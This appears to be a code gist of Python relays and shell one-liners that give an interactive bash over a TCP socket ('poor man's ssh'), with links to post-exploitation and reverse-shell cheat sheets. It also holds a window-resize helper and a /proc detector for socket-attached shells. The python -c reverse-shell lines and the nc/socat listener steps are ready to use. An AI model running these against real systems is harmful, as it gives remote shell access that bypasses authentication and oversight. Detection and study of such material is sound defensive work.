sh poor-mans-ssh.sh
# Variant 1: fork bash on a pty and relay bytes between the pty master, the
# remote socket and the local terminal (the shell's output is mirrored locally).
import sys, socket, os, fcntl, termios, array, select

_, ip, port = sys.argv
print("Opening connection...")
remote = socket.socket()
remote.connect((ip, int(port)))

print("Launching bash...")
pid, fd = os.forkpty()
if pid == 0:  # CHILD: becomes the interactive shell on the pty slave
    os.execlp('/bin/bash', 'bash', '-i')

# fix window size: copy the local terminal's rows/cols onto the pty master
buf = array.array('h', [0, 0, 0, 0])
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, buf, True)
fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)

print("Starting loop...")
while 1:
    avail, _, _ = select.select([fd, remote, sys.stdin], [], [])
    if fd in avail:
        try:
            data = os.read(fd, 1024)
        except OSError:  # EIO on the master: bash has exited
            break
        if not data:
            break
        os.write(remote.fileno(), data)
        os.write(sys.stdout.fileno(), data)
    if remote in avail:
        data = os.read(remote.fileno(), 1024)
        if not data:  # peer closed the connection
            break
        os.write(fd, data)
    if sys.stdin in avail:
        data = os.read(sys.stdin.fileno(), 1024)
        os.write(fd, data)
os.waitpid(pid, 0)  # reap the shell so it does not linger as a zombie
# Variant 2: let pty.spawn() do the relaying. stdin is redirected to the socket,
# and the master_read callback copies the shell's output to the socket; whatever
# the callback returns is written by pty.spawn to local stdout, so the session
# is visible on both ends.
import sys, socket, os, fcntl, struct, pty, termios

count = 0

def fix_window_size(fd):
    # runs once, on the first read from the pty master: copy the local
    # terminal's rows/cols (queried on stdout) onto the pty
    global count
    if count == 0:
        count = 1
        zeroes = struct.pack('HHHH', 0, 0, 0, 0)
        size_info = fcntl.ioctl(1, termios.TIOCGWINSZ, zeroes)
        rows, cols = struct.unpack('HHHH', size_info)[0:2]
        size_info = struct.pack('HHHH', rows, cols, 0, 0)
        fcntl.ioctl(fd, termios.TIOCSWINSZ, size_info)

_, ip, port = sys.argv
s = socket.socket()
s.connect((ip, int(port)))
os.dup2(s.fileno(), 0)  # the remote side becomes our stdin

def socket_read(fd):
    fix_window_size(fd)
    data = os.read(fd, 1024)
    os.write(s.fileno(), data)
    return data  # pty.spawn writes the returned bytes to local stdout

pty.spawn(['/bin/bash', '-i'], socket_read)
* http://www.ping.eti.br/docs/01/13.txt | "Random Shell Tricks by Teh Crew" - mini hacking guide
* http://pentestmonkey.net/blog/post-exploitation-without-a-tty | Post-Exploitation Without A TTY | pentestmonkey
* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | Reverse Shell Cheat Sheet | pentestmonkey
* http://bernardodamele.blogspot.ca/2011/09/reverse-shells-one-liners.html | Reverse shells one-liners
* http://serverfault.com/questions/102277/getting-a-tty-in-a-connectback-shell | linux - Getting a TTY in a Connectback Shell - Server Fault
* http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLE_OPTION_CTTY | socat
* http://www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt | www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt
* http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES | stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
* http://superuser.com/questions/123790/socat-and-rich-terminals-with-ctrlc-ctrlz-ctrld-propagation | linux - Socat and rich terminals (with Ctrl+C/Ctrl+Z/Ctrl+D propagation) - Super User
* http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/ | Get Your Interactive Reverse Shell on a Webhost | The #Shell
TODO:
* fix 80 character window limit (see http://sqizit.bartletts.id.au/2011/02/14/pseudo-terminals-in-python/)
* auto-kill spawned processes (not clear whether or not this is a problem..., check `ps aux | grep bash` after python quits)
* find a way to get python to print out the shell session to host terminal too (ask Vasi?)
* http://docs.python.org/dev/library/pty.html#pty.spawn
* http://opensource.apple.com/source/python/python-3/python/Lib/pty.py?txt
* http://coshell.googlecode.com/svn/trunk/coshell.py
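The window-size TODO above: both scripts copy the local terminal's rows/cols onto the pty once, at start-up, so a later resize of the local terminal never reaches the shell, which keeps redrawing at the old width. The following is an added example, not part of the gist, that keeps the two sizes in sync by re-copying them on every SIGWINCH. The names get_winsize, set_winsize, copy_winsize, install_sigwinch_forwarder and the roundtrip self-check are chosen here; it assumes a Linux/BSD pty where master and slave share one winsize.

```python
import fcntl
import os
import pty
import signal
import struct
import termios

# struct winsize is four unsigned shorts: rows, cols, xpixel, ypixel
WINSIZE_FMT = 'HHHH'

def pack_winsize(rows, cols):
    """Encode rows/cols as the buffer TIOCSWINSZ expects (pixel fields zero)."""
    return struct.pack(WINSIZE_FMT, rows, cols, 0, 0)

def unpack_winsize(buf):
    """Decode a TIOCGWINSZ result into (rows, cols)."""
    rows, cols, _, _ = struct.unpack(WINSIZE_FMT, buf)
    return rows, cols

def get_winsize(fd):
    """Ask the terminal or pty behind fd for its current size."""
    return unpack_winsize(fcntl.ioctl(fd, termios.TIOCGWINSZ, pack_winsize(0, 0)))

def set_winsize(fd, rows, cols):
    """Set the size of the pty behind fd. The kernel then delivers SIGWINCH to
    the pty's foreground process group, so a full-screen program redraws."""
    fcntl.ioctl(fd, termios.TIOCSWINSZ, pack_winsize(rows, cols))

def copy_winsize(src_fd, dst_fd):
    """Copy the size of src_fd's terminal onto dst_fd's pty; return (rows, cols)."""
    rows, cols = get_winsize(src_fd)
    set_winsize(dst_fd, rows, cols)
    return rows, cols

def install_sigwinch_forwarder(src_fd, dst_fd):
    """Copy the size now and again each time the local terminal is resized."""
    def on_winch(signum, frame):
        try:
            copy_winsize(src_fd, dst_fd)
        except OSError:
            pass  # one side is no longer a tty (e.g. the shell has exited)
    signal.signal(signal.SIGWINCH, on_winch)
    return copy_winsize(src_fd, dst_fd)

def roundtrip(rows, cols):
    """Self-check that needs no real terminal: size pty A, copy it onto pty B
    through B's master, read it back from B's slave (constructed scenario)."""
    a_master, a_slave = pty.openpty()
    b_master, b_slave = pty.openpty()
    try:
        set_winsize(a_slave, rows, cols)
        copy_winsize(a_slave, b_master)
        return get_winsize(b_slave)
    finally:
        for fd in (a_master, a_slave, b_master, b_slave):
            os.close(fd)

if __name__ == "__main__":
    print("round trip 40x132 ->", roundtrip(40, 132))
```

In the select() variant, call install_sigwinch_forwarder(sys.stdin.fileno(), fd) right after os.forkpty() and drop the one-time ioctl pair. On Python 3.5 and later select() is retried automatically after the handler runs (PEP 475); on older interpreters it raises EINTR and the loop has to catch and retry it.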
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# on the CLIENT, run the following:
# nc -l 12345
# on the SERVER, start the "reverse shell"
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345
# now go to the CLIENT, listen on port 12345 for incoming shell connections
nc -l 12345
# that worked, but note that 'nc' does a terrible job emulating a tty
# (arrow keys aren't sent correctly, don't even try launching vim)
# instead, let's install socat, a smarter netcat, via "sudo apt-get install socat" or "brew install socat"
# launch socat, asking it to forward all traffic on port 12345 to the current tty
# (`tty` expands to e.g. /dev/ttys003; raw,echo=0 fix the tty issues)
socat `tty`,raw,echo=0 tcp-listen:12345
# enjoy
##
## with gnu screen, to share a screen session on the network
##
# first ensure you are in a screen session
screen -R
# now start a python job to share it in the background
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(['/usr/bin/screen', '-x'])" 192.168.2.176 12345 &
# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed
##
## poor man's screencast - adapted from http://mrnugget.github.io/blog/2013/08/11/named-pipes/
## assumes your friend on 192.168.2.183 runs "nc -l 9999"
## then you can stream the contents of your terminal (read-only!) to him as follows:
## bonus trick: if you want to save your friend's otherwise discarded keystrokes, redirect to a file instead of /dev/null
##
# note: "-t 0" is the BSD/macOS script(1) flush interval; util-linux script on Linux uses -f for the same thing
script -t 0 >(nc 192.168.2.183 9999 > /dev/null)
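The one-liners above all share one tell-tale: a shell or interpreter whose standard descriptors 0, 1 and 2 are dup2()'d onto a socket (the pty.spawn variants leave the child bash on /dev/pts/N, but the Python parent still has the socket on fd 0). The following is an added detection example, not part of the gist, that looks for that pattern in /proc on Linux. The names std_fds_on_socket, looks_like_socket_shell and scan_procfs are chosen here, and the two fd tables are constructed samples of what readlink on /proc/PID/fd/* returns.

```python
import os
import re

# readlink on /proc/<pid>/fd/<n> yields "socket:[<inode>]" for a socket
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")
# shells and interpreters whose stdio is normally a tty or a pipe, never a socket
SHELL_LIKE = re.compile(r"^(sh|bash|dash|zsh|ksh|fish|python[\d.]*|perl|ruby|php|nc|ncat|socat)$")

def std_fds_on_socket(fd_links):
    """fd_links maps fd number -> readlink target; return the subset of 0/1/2 on a socket."""
    return {fd for fd in (0, 1, 2) if SOCKET_LINK.match(fd_links.get(fd, ""))}

def looks_like_socket_shell(comm, fd_links):
    """The dup2-to-socket pattern: shell-like process with stdin/stdout/stderr on a socket."""
    return bool(SHELL_LIKE.match(comm)) and bool(std_fds_on_socket(fd_links))

def read_fd_links(pid, proc="/proc"):
    links = {}
    fd_dir = os.path.join(proc, str(pid), "fd")
    try:
        names = os.listdir(fd_dir)
    except OSError:  # process gone, or not ours to inspect
        return links
    for name in names:
        try:
            links[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except (OSError, ValueError):
            continue
    return links

def read_comm(pid, proc="/proc"):
    try:
        with open(os.path.join(proc, str(pid), "comm")) as f:
            return f.read().strip()
    except OSError:
        return ""

def scan_procfs(proc="/proc"):
    """Walk procfs and return [(pid, comm, sorted std fds on a socket)] for matches."""
    findings = []
    try:
        entries = os.listdir(proc)
    except OSError:
        return findings
    for name in entries:
        if not name.isdigit():
            continue
        pid = int(name)
        comm = read_comm(pid, proc)
        links = read_fd_links(pid, proc)
        if looks_like_socket_shell(comm, links):
            findings.append((pid, comm, sorted(std_fds_on_socket(links))))
    return findings

# constructed sample: the "dup2 onto 0,1,2" one-liner as seen from /proc
SAMPLE_REVERSE_SHELL = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]", 255: "/dev/pts/3"}
# constructed sample: an ordinary interactive shell that merely has a socket open on fd 3
SAMPLE_BENIGN = {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3", 3: "socket:[48214]"}

if __name__ == "__main__":
    for pid, comm, fds in scan_procfs():
        print("pid %d (%s): std fds on a socket: %s" % (pid, comm, fds))
```

Run it as root to see every process's descriptors. Expect a few benign hits and triage them: inetd/xinetd-style services and anything launched by a supervisor that hands it a connected socket as stdin look the same (systemd socket activation passes sockets from fd 3, so it is not flagged). For the pty variants, the interesting process is the Python parent, whose child bash looks entirely normal.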